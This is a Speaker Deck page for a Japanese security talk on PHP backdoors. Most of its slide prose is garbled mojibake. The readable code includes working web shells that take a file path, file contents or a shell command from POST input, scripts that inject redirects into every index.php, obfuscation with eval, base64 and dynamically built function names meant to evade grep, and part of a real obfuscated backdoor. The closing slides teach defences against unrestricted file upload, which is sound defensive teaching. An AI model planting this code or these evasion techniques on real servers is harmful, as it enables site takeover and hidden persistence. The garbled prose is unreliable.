Upgrade to Pro — share decks privately, control downloads, hide ads and more …

作って理解するバックドア

Roku
March 23, 2023
Technology
0
860

 作って理解するバックドア

Roku

March 23, 2023
Tweet

More Decks by Roku

See All by Roku
本当にあった怖い脆弱性の話
ad5jp
20
36k

Other Decks in Technology

See All in Technology
RedMica 2.3 (2023-05) 新機能ハイライト およびRedmineの2023年5月までの半年間の主要な開発成果
vividtone
0
320
Princess APIのAPIクライアントをTypeScriptで作ってnpmで公開してみた
ohmori_yusuke
1
550
ローカルAITuber勢の現在地と未来
sr2mg4
0
130
組織の立ち上げと体制変更の1年
tarappo
2
940
Oracle Exadata Database Service on [email protected] ([email protected]) - UI スクリーン・キャプチャ集
oracle4engineer
PRO
0
430
人工知能学会 AI哲学マップ・総括セッション 講演資料
miyayou
3
1.3k
しつこくじわじわパフォーマンスチューニング
netmarkjp
0
470
net/http/httptest.Server のアプローチをテスト戦略に活用する / Go Conference 2023
k1low
7
1.2k
失敗から学ぶQA組織
taro_nanairo
1
300
GO TechTalk #19 タクシーアプリ『GO』事業成長を支えるデータ分析基盤の継続的改善!
mot_techtalk
2
1.1k
金融系子会社でレガシーシステムしか作ったことないけど、モダン開発に挑戦してみた
marikashiotsuki
1
130
WWDC「間」を復習しよう
line_developers
PRO
0
400

Featured

See All Featured
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
239
19k
Building an army of robots
kneath
300
41k
Documentation Writing (for coders)
carmenintech
53
3.1k
No one is an island. Learnings from fostering a developers community.
thoeni
13
1.7k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
25
5.3k
Building a Scalable Design System with Sketch
lauravandoore
451
31k
Pencils Down: Stop Designing & Start Developing
hursman
115
10k
The World Runs on Bad Software
bkeepers
PRO
59
5.9k
YesSQL, Process and Tooling at Scale
rocio
158
13k
How STYLIGHT went responsive
nonsquared
89
4.3k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
350
28k
The Cult of Friendly URLs
andyhume
70
5.2k

Transcript

  1. ࡞ͬͯཧղ͢ΔόοΫυΞ
    -FU`T%*:

    View Slide

  2. ࣗݾ঺հ
    w גࣜձࣾ"%୅ද
    w ొ࿥ த
    ηΩεϖʢʙʣ
    w 1)1FS,BJHJొஃ

    ʮຊ౰ʹ͋ͬͨා͍੬ऑੑͷ࿩ʯ
    3PLV !BEKQ

    View Slide

  3. ຊ౰͸๻΋ΞʔΩςΫνϟ࿦ͱ͔
    ϢχοτςετΈ͍ͨͳ
    ΩϥΩϥͨ͠࿩͕͍͚ͨ͠ΕͲɺ
    ಙ̋͞Μͷޙ佂తϙδγϣϯΛૂͬͯɺ
    ࠓճ΋ηΩϡϦςΟωλͰ͢ɻ

    View Slide

  4. ೥΄Ͳલͷ͓࿩
    w ,͞Μʮ3PLV͞ʔΜʂIUBDDFTT͕ফͤͳ͍ΜͰ͢ʢٽʣʯ
    w ๻ʮʢ͋͋ɺύʔϛογϣϯ͔ͳʁʣͲ͜ͷαΠτͰ͔͢ʁʯ
    w ,͞ΜʮʓʓͰ͢ɻαΠτશମ͕ݟ͑ͳ͘ͳͬͯͯʢٽʣʯ
    w ๻ʮʢϙνϙνʣɾɾɾ͋Εʁফͤ·ͨ͠Αʯ
    w ,͞ΜʮԿ౓ফͯ͠΋਺෼͓͖ʹ෮׆͢ΔΜͰ͢ʢྦʣʯ

    View Slide

  5. ͦΕɺόοΫυΞͰ͢ɻ

    View Slide

  6. ࠓճͷ಺༰
    w όοΫυΞͷ֓ཁ
    w όοΫυΞͷ࡞Γํͱ࣮ྫ
    w όοΫυΞͷରࡦ

    View Slide

  7. όοΫυΞͷ֓ཁ

    View Slide

  8. ࣮ԋ
    w ͋Δͱ͜ΖʹɺԿͷม఩΋ͳ͍ϝʔϧϑΥʔϜ͕͋Γ·ͨ͠ɻ

    View Slide

  9. ࣮ԋ
    w ѱ͍ਓ͕ϑΝΠϧ͕͜ΜͳϑΝΠϧΛΞοϓϩʔυ͠·ͨ͠ɻ


    SFXSJUFJOEFYQIQ


    $path = __DIR__ . '/../../../public/index.php';


    $code = "

    file_put_contents($path, $code);


    die('success');


    View Slide

  10. ࣮ԋ
    w ͦͯ͠ɺϑΝΠϧͷϓϨϏϡʔϦϯΫΛΫϦοΫ͠·ͨ͠ɻ

    View Slide

  11. ࣮ԋ
    w ͦͯ͠ɺϑΝΠϧͷϓϨϏϡʔϦϯΫΛΫϦοΫ͠·ͨ͠ɻ

    View Slide

  12. ࣮ԋ
    w αΠτશମ͕͜͏ͳΓ·ͨ͠ɻ

    View Slide

  13. ߈ܸ༻ϑΝΠϧ͍Ζ͍Ζ
    w ΋ͬͱλνѱ͍΍ͭɻ


    $path = __DIR__ . '/../../../public/index.php';


    $code = "

    file_put_contents($path, $code);


    die('success');


    View Slide

  14. ߈ܸ༻ϑΝΠϧ͍Ζ͍Ζ
    w యܕతʹ͸͜Εɻ


    file_put_contents($_POST['path'], $_POST['code']);




    exec($_POST['command']);


    View Slide

  15. ͜ΜͳϑΝΠϧΛΞοϓϩʔυ͞ΕͨΒ
    w ΋͸΍ୈࡾऀ͕αʔόΛࣗ༝ʹૢ࡞Ͱ͖Δͷͱಉ͡

    ʹαʔόͷཪޱʢόοΫυΞʣ

    View Slide

  16. ߈ܸͷྲྀΕ

    View Slide

  17. ߈ܸͷྲྀΕ

    View Slide

  18. ߈ܸͷྲྀΕ

    View Slide

  19. ߈ܸͷྲྀΕ

    View Slide

  20. ߈ܸͷྲྀΕ

    View Slide

  21. ߈ܸͷྲྀΕʢ·ͱΊʣ
    w ࠷ॳͷ߈ܸ༻ϑΝΠϧ͕ɺ੬ऑੑΛ௨ͯ͡αʔόʹஔ͔ΕΔ

    ˣ
    w ओ໨తͰ͋Δվ͟ΜΛߦ͍ͭͭɺ

    ୈ̎ɼୈ̏ͷ߈ܸ༻ϑΝΠϧΛผͷ৔ॴʹஔ͘ɻ

    ˣ
    w ࠷ॳͷ߈ܸ༻ϑΝΠϧ͕ۦআ͞Εͯ΋ɺୈ̎ɺୈ̏ͷ

    ߈ܸ༻ϑΝΠϧʹΑΓɺվ͟ΜΛ܁Γฦ͢ɻ

    View Slide

  22. ͭ·ΓόοΫυΞ͸
    w੬ऑੑͦͷ΋ͷͰ͸ͳ͘ɺ

    ߈ܸ໨తͦͷ΋ͷͰ΋ͳ͍ɻ
    wҰ౓੒ޭͨ͠߈ܸΛܧଓతʹߦ͍΍͘͢ɺ

    ·ͨۦআ͠ʹ͘͘͢ΔͨΊͷதؒखஈɻ

    View Slide

  23. ࠜຊݪҼͱͳΔ੬ऑੑ
    w ةݥͳλΠϓͷϑΝΠϧͷແ੍ݶΞοϓϩʔυ

    ʢ$8&ʣ
    w 04ίϚϯυΠϯδΣΫγϣϯ

    ʢ$8&ʣ
    w ͳͲɻ

    View Slide

  24. ߈ܸͷओ໨త
    ΤϯτϦʔϙΠϯτ JOEFYQIQ
    ΍IUBDDFTTΛվ͟Μ͠ɺ
    w ϢʔβΛ߈ܸऀͷαΠτʹඈ͹͢ɻ
    w ةݥͳϑΝΠϧΛμ΢ϯϩʔυͤ͞Δɻ
    w %%P4߈ܸ౳ͷ౿Έ୆ʹ͢Δɻ
    w FOW౳ͷ৘ใΛൈ͖औΔɻ
    w ηογϣϯ౳͔ΒϢʔβͷൿີ৘ใΛൈ͖औΔɻ

    View Slide

  25. όοΫυΞͷ࡞Γํ

    View Slide

  26. ͖ͬ͞ͷαϯϓϧ


    $path = __DIR__ . '/../../../public/index.php';


    $code = "

    file_put_contents($path, $code);


    die('success');


    View Slide

  27. ͖ͬ͞ͷαϯϓϧ


    $path = __DIR__ . '/../../../public/index.php';


    $code = "

    file_put_contents($path, $code);


    die('success');


    ͜Μͳվ͟ΜͳΒ·ͩϚγɻ

    View Slide

  28. άϨʔυΞοϓ


    $code = <<<'EOM'




    if (empty($_SESSION) && empty($_COOKIE)) {


    header('Location: https://ad5.jp');


    }


    ?>


    EOM;


    $path = __DIR__ . '/../../../public/index.php';


    $code .= file_get_contents($path, $code);


    file_put_contents($path, $code);


    View Slide

  29. άϨʔυΞοϓ


    $code = <<<'EOM'




    if (empty($_SESSION) && empty($_COOKIE)) {


    header('Location: https://ad5.jp');


    }


    ?>


    EOM;


    $path = __DIR__ . '/../../../public/index.php';


    $code .= file_get_contents($path, $code);


    file_put_contents($path, $code);


    ؅ཧऀ΍։ൃऀ͕ؾ͔ͮͳ͍͏ͪʹɺ
    ৽ن๚໰ऀ͚͕ͩඈ͹͞Εଓ͚Δɻ

    View Slide

  30. ͜ΜͳύεܾΊଧͪͷ߈ܸ
    ౰ͨΔΘ͚ͶʔͩΖ͆͆͆

    View Slide

  31. HMPC
    Λ࢖ͬͯ૯౰ͨΓ


    function prepend($path) {


    $code .= file_get_contents($path, “…߈ܸ༻ίʔυ…”);


    file_put_contents($path, $code);


    }


    function prependRecursive($path) {


    if (file_exists("{$path}/index.php")) {


    prepend("{$path}/index.php");


    }


    foreach (glob("{$path}/*") as $child) {


    if (is_dir($child)) {


    prependRecursive($child);


    }


    }


    }


    prependRecursive($_SERVER["DOCUMENT_ROOT"]);

    View Slide

  32. ൃݟ͞Εʹ͍͘ϑΝΠϧΛૂ͏
    w ϑϨʔϜϫʔΫʹඞͣଘࡏ͢ΔϑΝΠϧΛվ͟Μ

    ྫʣQVCMJDJOEFYQIQ
    w ϑϨʔϜϫʔΫʹ͍͔ʹ΋͋Γͦ͏ͳ໊લͷϑΝΠϧΛઃஔ

    ྫʣMPBEQIQ

    MPDBMFQIQ
    w HJUJHOPSF͞Ε͍ͯΔσΟϨΫτϦʹϑΝΠϧΛઃஔ

    ྫʣTUPSBHFQVCMJD

    View Slide

  33. 8PSE1SFTTͳΒɾɾɾ
    w XQBENJO΍XQJODMVEFT಺ͷϑΝΠϧΛվ͟Μɺ

    ·ͨ͸ϑΝΠϧΛઃஔ
    w XQDPOUFOUQMVHJOTYYY಺ͷϑΝΠϧΛվ͟Μɺ

    ·ͨ͸ϑΝΠϧΛઃஔ
    w XQDPOUFOUVQMPBET಺ʹϑΝΠϧΛઃஔ

    View Slide

  34. [email protected]@DPOUFOU
    ͱ͔
    GXSJUF
    ͱ͔ͰHSFQͨ͠Β
    ۦআͰ͖ΔΜ͡ΌͶʁ

    View Slide

  35. ྫ͑͹͜ͷίʔυ


    $path = __DIR__ . '/../../../public/index.php';


    $code = "

    file_put_contents($path, $code);


    View Slide

  36. ͜͏ͯ͠


    eval("$path = __DIR__ . '/../../../public/index.php';
    $code = \"\";file_put_contents($path, $code)");


    View Slide

  37. ͜͏͢Δͱ


    eval(base64_decode("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8
    uLi9wdWJsaWMvaW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZG
    VyKCdMb2NhdGlvbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1d
    F9jb250ZW50cygkcGF0aCwgJGNvZGUp"));


    View Slide

  38. [email protected]@DPOUFOU

    ফ͑·ͨ͠ɻ

    View Slide

  39. ͡Ό͋ɺFWBM
    ͱ͔
    [email protected]
    Ͱ΋
    HSFQ͢Ε͹͍͍Μ͡ΌͶʁ

    View Slide

  40. 1)1͞Μ͸ॊೈͳΜͰ͢ɻ


    $a = "eval";


    $b = “base64_encode";


    $a($b("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8uLi9wdWJsaWMv
    aW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZGVyKCdMb2NhdGl
    vbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1dF9jb250ZW50cy
    gkcGF0aCwgJGNvZGUp"));


    View Slide

  41. 1)1͞Μ͸ॊೈͳΜͰ͢ɻ


    $x = '0123456789abcdefghijklmnopqrstuvwxyz_';


    $a = $x[14].$x[31].$x[10].$x[21];


    $b = $x[11].$x[10].$x[28].$x[14].$x[6].$x[4].$x[36].
    $x[13].$x[14].$x[12].$x[24].$x[13].$x[14];


    $a($b("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8uLi9wdWJsaWMv
    aW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZGVyKCdMb2NhdGl
    vbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1dF9jb250ZW50cy
    gkcGF0aCwgJGNvZGUp"));


    View Slide

  42. ίʔυ͔ΒҰ੾ͷ
    ؔ਺͕ফ͑·ͨ͠

    View Slide

  43. HSFQແཧͰ͢ɻ

    View Slide

  44. ˞͓அΓ
    w ઌఔͷίʔυ͸̍఺ӕ͕͋Γ·͢ɻ

    FWBM͸ؔ਺Ͱ͸ͳ͘ݴޠߏ଄ͷͨΊɺ



    ͸ಈ͖·ͤΜɻ
    w ࣮ࡍͷஈ໨ͷ೉ಡԽʹ͸ɺ

    [email protected]
    ؔ਺ 1)1
    ͕࢖ΘΕ͍ͯΔ΋ͷ͕

    ଟ͘ݟΒΕ·ͨ͠ɻ
    $a = "eval";


    $a();

    View Slide

  45. ࣮ࡍʹ࠾ूͨ͠όοΫυΞ MPDBMFQIQ

    ˞໿ CZUF
    0i9tvf_”76*.2n[je';$q2866=$tJvyYsXGpmgwi[(105/15)].
    $tJvyYsXGpmgwi[(26-1)].$tJvyYsXGpmgwi[(1*49)].
    $tJvyYsXGpmgwi[((10*1)+18)].$tJvyYsXGpmgwi[(14+22)].
    $tJvyYsXGpmgwi[(44+5)].$tJvyYsXGpmgwi[(44-13)].$tJvyYsXGpmgwi[(684/18)].
    $tJvyYsXGpmgwi[(23+4)].$tJvyYsXGpmgwi[(72-(33-7))].
    $tJvyYsXGpmgwi[(154/22)].$tJvyYsXGpmgwi[(11+25)].$tJvyYsXGpmgwi[(65-
    (62-31))].$tJvyYsXGpmgwi[(26-6)].$tJvyYsXGpmgwi[((27*2)-8)];
    $pHFdNhg9688=$tJvyYsXGpmgwi[(20-9)].$tJvyYsXGpmgwi[(2*4)].
    $tJvyYsXGpmgwi[(29*1)].$tJvyYsXGpmgwi[(160/4)];
    $MYtraky2482=$tJvyYsXGpmgwi[(8*5)].$tJvyYsXGpmgwi[((1+0)+2)].
    $tJvyYsXGpmgwi[(6+(1*(95/19)))].$tJvyYsXGpmgwi[(140/5)].
    $tJvyYsXGpmgwi[(522/18)].$tJvyYsXGpmgwi[(7*((7-3)-2))]. …ུ…

    View Slide

  46. ղಡ͢Δͱ͜͏ͳͬͯͨɻ


    $x=“‘7RxrU9tI8jP8CqGiIvtWyCYJSRYwgSTO4y4BziZ3l98Q…ུ…“;


    $a=base64_decode($x);


    $b=gzinflate($a);


    eval($b);


    View Slide

  47. EFDPEF͢Δͱɻ


    error_reporting(0);


    @set_time_limit(3600);


    @ignore_user_abort(1);


    $xmlname = 'mapss.xml';


    $dt = 0;


    $sitemap_file = 'sitemap';


    $mapnum = 2000;


    if(isset($_GET['dt'])){


    $dt = $_GET['dt'];


    }


    $site = @$_GET['smsite'];


    $jdir = '';


    $http_web = 'http';


    if(is_https()){


    $http = 'https';


    }else{


    …ུ…

    View Slide

  48. MPDBMFQIQͷಛ௃
    w (PPHMFʹِͷαΠτϚοϓ౳Λૹ͍ͬͯΔɻ

    ˠ4FBSDI$POTPMF΍ݕࡧ݁ՌͷΞϥʔτʹΑΓɺ

    ɹӡӦऀ΍Ϣʔβʹؾ͔ͮΕΔͷΛ๷͙ͨΊɻ
    w $44΍ը૾౳ͷೖͬͨσΟϨΫτϦΛૂ͍ͬͯΔɻ
    w ϑΝΠϧʹॻ͖ࠐΉ಺༰Λ֎෦63-͔Βऔಘ͍ͯ͠Δɻ

    ˠ͓ͦΒ͘߈ܸऀͷ࢘ྩ༻αʔόɻ͜ͷ಺༰Λมߋ͢Δ͜ͱͰ

    ɹ߈ܸ༻ϑΝΠϧΛมߋͤͣͱ΋ɺ߈ܸ಺༰Λม͑ΒΕΔɻ

    View Slide

  49. શจ͓Αͼଞͷαϯϓϧ͸ͪ͜Β͔ΒͲ͏ͧ
    HJUIVCDPNBEKQQIQFSLBJHJ

    View Slide

  50. όοΫυΞͷରࡦ

    View Slide

  51. ઃஔ͞Εͳ͍Α͏ʹ͢Δɻ

    View Slide

  52. Ҏ্ɻ

    View Slide

  53. ࠜຊݪҼͱͳΔ੬ऑੑ
    w ةݥͳλΠϓͷϑΝΠϧͷແ੍ݶΞοϓϩʔυ

    ʢ$8&ʣ
    w 04ίϚϯυΠϯδΣΫγϣϯ

    ʢ$8&ʣ
    w ͳͲɻ

    View Slide

  54. ࠜຊݪҼͱͳΔ੬ऑੑ
    w ةݥͳλΠϓͷϑΝΠϧͷແ੍ݶΞοϓϩʔυ

    ʢ$8&ʣ
    w 04ίϚϯυΠϯδΣΫγϣϯ

    ʢ$8&ʣ
    w ͳͲɻ
    ࠓ೔͸͜Εʹߜ͓ͬͯ࿩͠·͢ɻ

    View Slide

  55. ࣮ԋʹ࢖༻͓ͨ͠໰͍߹ΘͤϑΥʔϜ
    public function goConfirm(InquiryRequest $request) : RedirectResponse


    {


    $data = $request->input();


    $saving_path = storage_path('app/public/' . $_FILES['file']['name']);


    move_uploaded_file($_FILES['file']['tmp_name'], $saving_path);


    chmod($saving_path, 0755);


    $data['file_name'] = $_FILES['file']['name'];


    $data['file_url'] = url('storage/', $_FILES['file']['name']);


    session()->put('inquiry', $data);


    return redirect()->route('confirm');


    }


    View Slide

  56. ྲྀੴʹ͜Μͳ࣮૷͢Δਓ͸
    ͍ͳ͍ͱࢥ͍·͕͢ɾɾɾ

    View Slide

  57. ͡Ό͋ɺ͜Ε͸҆શͰ͔͢ʁ
    public function goConfirm(InquiryRequest $request) : RedirectResponse


    {


    $uploaded_file = $request->file(‘file');


    $path = $uploaded_file->storePublicly('upload', ['disk' =>
    'public']);


    //ུ


    }

    View Slide

  58. ͡Ό͋ɺ͜Ε͸҆શͰ͔͢ʁ
    public function goConfirm(InquiryRequest $request) : RedirectResponse


    {


    $uploaded_file = $request->file(‘file');


    $path = $uploaded_file->storePublicly('upload', ['disk' =>
    'public']);


    //ུ


    }
    ݁࿦͔Βݴ͑͹ɺ΄ͱΜͲͷ৚݅ԼͰ͸ηʔϑͰ͢ɻ
    Կނηʔϑͳͷ͔ɺͲ͏͍͏৚݅ԼͰةݥͳͷ͔ɺ
    ౴͑ΒΕ·͔͢ʁ

    View Slide

  59. ͳͥ͜Μͳ͜ͱΛ㘤͘ͷ͔ɻ
    w୭΋ɺ੬ऑੑΛ࡞Ζ͏ͱࢥͬͯ࡞͍ͬͯͳ͍ɻ
    w࣮ࡍͷϓϩμΫτͷ࢓༷͸ෳࡶͰɺ

    ίʔυ΋ෳࡶʹೖΓ૊ΜͰ͍Δɻ

    ͦͷ݁Ռɺ໰୊͕ൃੜ͢Δ৚͕݅ͨ·ͨ·ἧͬͯ͠·͍ɺ

    ੬ऑੑ͕ੜ·Εͯ͠·͏ɻ
    wਖ਼֬ͳཧղ͕ॏཁɻ

    View Slide

  60. ߈ܸͷ੒ཱ৚݅
    ᶃ1)1౳ͷεΫϦϓτϑΝΠϧ͕ΞοϓϩʔυͰ͖ͯ͠·͏ɻ
    ᶄΞοϓϩʔυઌ͕ಉҰαʔό಺ͷެ։σΟϨΫτϦͰ͋Δɻ
    ᶅΞοϓϩʔυ͞ΕͨϑΝΠϧ͕࣮ߦՄೳͰ͋Δɻ

    View Slide

  61. ੒ཱ৚݅ͱରࡦ
    ᶃ1)1౳ͷεΫϦϓτϑΝΠϧ͕ΞοϓϩʔυͰ͖ͯ͠·͏ɻ
    ˠ.JNF5ZQFΛνΣοΫ͠ɺඞཁ࠷খݶͷछྨͷϑΝΠϧͷ

    ɹΞοϓϩʔυͷΈڐՄ͢Δɻ
    ɾɾɾཁ݅ʹΑͬͯ͸.JNF5ZQFͷ੍ݶ͕ࠔ೉ͳ৔߹΋͋Δɻ

    View Slide

  62. ੒ཱ৚݅ͱରࡦ
    ᶄΞοϓϩʔυઌ͕ಉҰαʔό಺ͷެ։σΟϨΫτϦͰ͋Δɻ
    ˠΞοϓϩʔυϑΝΠϧΛඇެ։σΟϨΫτϦʹஔ͍ͯ

    ɹ͍Ε͹ɺ߈ܸʹ࢖༻͞ΕΔ͜ͱ͸ͳ͍ɻ

    ɹ·ͨɺΞϓϦέʔγϣϯͷઃஔ͞Εͨ8FCαʔόͱผͷ

    ɹ৔ॴʹϑΝΠϧΛஔ͍͍ͯΕ͹ɺ߈ܸ͸੒ཱ͠ͳ͍ɻ

    ɾɾɾ͜Ε΋ཁ݅࣍ୈͰ࣮ݱͰ͖ͳ͍৔߹΋ɻ

    ɹɹɹͦ΋ͦ΋ຊ࣭తରࡦͰ͸ͳ͍ɻ

    View Slide

  63. ੒ཱ৚݅ͱରࡦ
    ᶅΞοϓϩʔυ͞ΕͨϑΝΠϧ͕࣮ߦՄೳͰ͋Δɻ
    ΑΓ۩ମతʹ͸ɺҎԼͷ̎৚݅ɻ
    "1)1΍$(*ͱͯ͠ղऍ͞ΕΔʢ࣮ߦ༻ͷϋϯυϥʹ

    ɹϚοϓ͞Ε͍ͯΔʣϑΝΠϧ໊Ͱอଘ͞ΕΔɻ
    #࣮ߦՄೳͳύʔϛογϣϯͰอଘ͞ΕΔɻ

    View Slide

  64. ੒ཱ৚݅ͱରࡦ
    ᶅ"1)1΍$(*ͱͯ͠ղऍ͞ΕΔϑΝΠϧ໊Ͱอଘ͞ΕΔɻ
    Ұൠతʹɺ֦ுࢠ͕QIQͰͳ͚Ε͹ɺ1)1ͱ࣮ͯ͠ߦ͞ΕΔ

    ͜ͱ͸ͳ͍ɻ

    ʢ1)1ίʔυ͕ॻ͔Ε͍ͯͯ΋ɺ୯ͳΔςΩετϑΝΠϧ

    ɹͱͯ͠ѻΘΕΕ͹ແ֐ʣ
    ˞ୠ͠ɺ্ه͸8FCαʔόͷઃఆʹґଘ͢Δʢޙड़ʣɻ

    View Slide

  65. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ
    public function goConfirm(InquiryRequest $request) : RedirectResponse


    {


    $uploaded_file = $request->file(‘file');


    $path = $uploaded_file->storePublicly('upload', ['disk' =>
    'public']);


    //ུ


    }

    View Slide

  66. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ
    public function goConfirm(InquiryRequest $request) : RedirectResponse


    {


    $uploaded_file = $request->file(‘file');


    $path = $uploaded_file->storePublicly('upload', ['disk' =>
    'public']);


    //ུ


    }
    σϑΥϧτͰ͸ɺQIQϑΝΠϧΛΞοϓϩʔυͨ͠৔߹ɺ
    ֦ுࢠͳ͠ʹͳΔɻ

    View Slide

  67. 6QMPBEFE'JMFTUPSF
    ͷ࣮૷
    6QMPBEFE'JMFIBTI/BNF
    ʹΑΓϑΝΠϧ໊͕ܾఆ͞ΕΔɻ

    ֦ுࢠ͸ɺ'JMFHVFTT&YUFOUJPO
    ʹΑܾͬͯΊΒΕΔɻ

    1)1ϑΝΠϧΛΞοϓϩʔυͨ͠৔߹ɺ.JNF5ZQF͸

    UFYUYQIQͱͳΓɺ.JNF5ZQF."1ͷఆٛʹै͍ɺ

    ֦ுࢠͳ͠Ͱ֨ೲ͞ΕΔɻ
    6QMPBEFE'JMFʜ*MMVNJOBUFa)UUQa6QMPBEFE'JMF

    'JMFʜ4ZNGPOZa$PNQPOFOUa)UUQ'PVOEBUJPOa'JMFa'JMF

    .JNF5ZQFTʜ4ZNGPOZa$PNQPOFOUa.JNFa.JNF5ZQFT

    View Slide

  68. ྫ֎
    ͨͩ͠ɺ͜ͷڍಈ͸ɺ.JNF5ZQFEFGBVMUΛηοτ͢Δ͜ͱ
    ͰมߋՄೳͰ͋Δɻ

    ੩తϓϩύςΟͰ͋ΔͨΊɺྫ͑͹4FSWJDF1SPWJEFS౳Ͱ

    ηοτ͍ͯ͠Ε͹ɺΞϓϦέʔγϣϯશମʹӨڹ͕ٴͿɻ
    .JNF5ZQFTʜ4ZNGPOZa$PNQPOFOUa.JNFa.JNF5ZQFT

    View Slide

  69. ͜Μͳ࣮૷΋ɺ΍Γ͕ͪɻ
    public function goConfirm(InquiryRequest $request) : RedirectResponse


    {


    $uploaded_file = $request->file(‘file');


    $filename = Carbon::now()->format(‘Ymd_His.')


    . $uploaded_file->getClientOriginalExtension();


    $path = $uploaded_file->storePubliclyAs('upload', $filename ,


    ['disk' => 'public']);


    //ུ


    }
    ϑΝΠϧ໊ʹ೔෇΍*%౳ͷϧʔϧΛ࣋ͨͤͯอଘ͢Δ৔߹ɻ
    HFU$MJFOU0SJHJOBM&YUFOTJPO
    ΑΓHVFTT&YUFOUJPO

    View Slide

  70. ͦ΋ͦ΋
    ྫ͑͹"QBDIFͷ৔߹ɺIUUQEDPOG΍IUBDDFTTʹ
    ͷΑ͏ʹهड़͞Ε͍ͯΕ͹ɺ֦ுࢠIUNMͰ΋Ξ΢τɻ
    ཧ࿦্ɺઃఆ࣍ୈͰ͸ɺ͋ΒΏΔ໊લͷϑΝΠϧ͕1)1ͱͯ͠

    ࣮ߦՄೳͰ͋Δɻ
    8FCαʔόͷઃఆʹґଘ͢΂͖Ͱ͸ͳ͍ɻ
    AddHandler php-script .php .html

    View Slide

  71. ੒ཱ৚݅ͱରࡦ
    ᶅ#࣮ߦՄೳͳύʔϛογϣϯͰอଘ͞ΕΔɻ
    1)1ʹΑͬͯઃஔ͞ΕͨϑΝΠϧͷॴ༗ऀ͸ɺ௨ৗ1)1ͷ࣮ߦ
    ϢʔβͰ͋ΔͨΊɺॴ༗ऀͷ࣮ߦݖݶ͕͋Ε͹Ξ΢τɻ
    ˠSXYSXYSXYˠΞ΢τ

    ˠSXSXSXˠηʔϑ

    ˠSXYSYSYˠΞ΢τ

    ˠSXSSˠηʔϑ

    ˠSXYˠΞ΢τ

    View Slide

  72. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ
    public function goConfirm(InquiryRequest $request) : RedirectResponse


    {


    $uploaded_file = $request->file(‘file');


    $path = $uploaded_file->storePublicly('upload', ['disk' =>
    'public']);


    //ུ


    }

    View Slide

  73. 6QMPBEFE'JMFTUPSF
    ͷ࣮૷
    ιʔείʔυϦʔσΟϯά͸ׂѪ͠·͕͢ɾɾɾ
    ઃఆϑΝΠϧDPO
    fi
    H
    fi
    MFTZTUFNTQIQ

    ͷEJTLTQVCMJDQFSNJTTJPOTͷઃఆʹґଘ͠·͢ɻ
    σϑΥϧτͰ͸ɺσΟϨΫτϦ͸·ͨ͸ʹɺ

    ϑΝΠϧ͸·ͨ͸ʹͳ͍ͬͯ·͢ɻ
    ˠ͜ͷઃఆΛมߋ͍ͯ͠ͳ͍ݶΓ͸ɺ

    ɹલड़ͷίʔυ͸ύʔϛογϣϯʹͳΓ·͢ɻ

    View Slide

  74. ΋ͪΖΜɺ
    ࣗྗͰDINPE QBUI
    ͱ͔ͯͨ͠ΒΞ΢τͰ͢ɻ
    TUPSBHFϑΥϧμ͸ύʔϛογϣϯʹ͢΂͠ɺ

    ͱ͍͏ޡͬͨղઆΛɺ͞ΒʹऔΓҧ͑ͯɺ

    ϑΝΠϧอଘޙʹɺΘ͟Θ͟ύʔϛογϣϯʹ

    มߋ͍ͯ͠Δ࣮૷ɺݟͨ͜ͱ͋Γ·͢ɻɻɻ

    View Slide

  75. ͪͳΈʹ͜ͷ৔߹
    public function goConfirm(InquiryRequest $request) : RedirectResponse


    {


    $data = $request->input();


    $saving_path = storage_path('app/public/' . $_FILES['file']['name']);


    move_uploaded_file($_FILES['file']['tmp_name'], $saving_path);


    //ུ


    }


    ύʔϛογϣϯ͸Ͳ͏ͳΔ͔ɺ౴͑ΒΕ·͔͢ʁ

    View Slide

  76. [email protected]@DPOUFOU
    ౳ͷύʔϛογϣϯ
    w 04ͷઃఆʢVNBTLʣʹґଘ͠·͢ɻ

    ଟ͘ͷ؀ڥͰ͸ɺσΟϨΫτϦ͸ ·ͨ͸
    ɺ

    ϑΝΠϧ͸ ·ͨ͸
    Ͱ͢ɻ
    w 04ͷઃఆʹ΋ґଘ͢΂͖Ͱ͸ͳ͘ɺΞϓϦέʔγϣϯ಺Ͱ

    ໌ࣔతʹରॲ͢΂͖Ͱ͢ɻ

    View Slide

  77. ·ͱΊʢ$8&ͷରࡦʣ
    w ཁٻ࢓্༷ՄೳͳΒɺΞοϓϩʔυՄೳͳϑΝΠϧΛ

    .JNF5ZQFͰඞཁ࠷খݶͷ΋ͷͷΈʹ੍ݶ͢Δɻ
    w ΞοϓϩʔυޙͷϑΝΠϧ͸࣮ߦෆՄೳͳύʔϛογϣϯʹɻ
    w ΞοϓϩʔυޙͷϑΝΠϧ͸࣮ߦෆՄೳͳϑΝΠϧ໊ʹɻ
    w -BSBWFMͷ6QMPBEFE'JMFTUPSF
    Ͱ͑͞ɺ

    ͍͔ͭ͘ͷ৚͕݅ॏͳΕ͹ةݥͳ࣮૷ʹͳΔɻ

    View Slide

  78. αʔυύʔςΟ੡ϥΠϒϥϦ΋ཁ஫ҙ
    w +7/%#

    8PSE1SFTT༻DPOUBDUGPSNϓϥάΠϯʹ͓͚Δةݥͳλ
    ΠϓͷϑΝΠϧͷແ੍ݶΞοϓϩʔυʹؔ͢Δ੬ऑੑ
    w +7/%#

    .PWBCMF5ZQFͷ9.-31$"1*ʹ͓͚Δ04ίϚϯυΠϯδ
    ΣΫγϣϯͷ੬ऑੑ
    ˠͲͪΒ΋ɺେྔͷόοΫυΞඃ֐Λൃੜͤ͞·ͨ͠ɻ

    View Slide

  79. ͏ͪ͸8PSE1SFTT
    ࢖Θͳ͍͔Βେৎ෉ʁ

    View Slide

  80. օ͞Μͷ͓٬༷ͷଟ͕͘ɺ
